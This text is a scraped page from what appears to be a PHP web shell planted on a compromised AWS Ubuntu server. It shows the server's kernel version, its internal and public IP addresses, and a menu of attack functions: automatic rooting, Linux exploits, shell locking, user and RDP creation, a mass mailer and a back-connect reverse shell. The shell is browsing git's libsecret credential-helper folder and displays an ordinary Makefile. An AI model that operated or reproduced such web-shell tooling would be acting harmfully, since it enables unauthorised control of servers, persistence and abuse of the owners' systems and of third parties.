Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.129.253.21
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
git /
contrib /
credential /
libsecret /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
477
B
-rw-r--r--
git-credential-libsecret.c
8.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
MAIN:=git-credential-libsecret all:: $(MAIN) CC = gcc RM = rm -f CFLAGS = -g -O2 -Wall PKG_CONFIG = pkg-config -include ../../../config.mak.autogen -include ../../../config.mak INCS:=$(shell $(PKG_CONFIG) --cflags libsecret-1 glib-2.0) LIBS:=$(shell $(PKG_CONFIG) --libs libsecret-1 glib-2.0) SRCS:=$(MAIN).c OBJS:=$(SRCS:.c=.o) %.o: %.c $(CC) $(CFLAGS) $(CPPFLAGS) $(INCS) -o $@ -c $< $(MAIN): $(OBJS) $(CC) -o $@ $(LDFLAGS) $^ $(LIBS) clean: @$(RM) $(MAIN) $(OBJS)
Close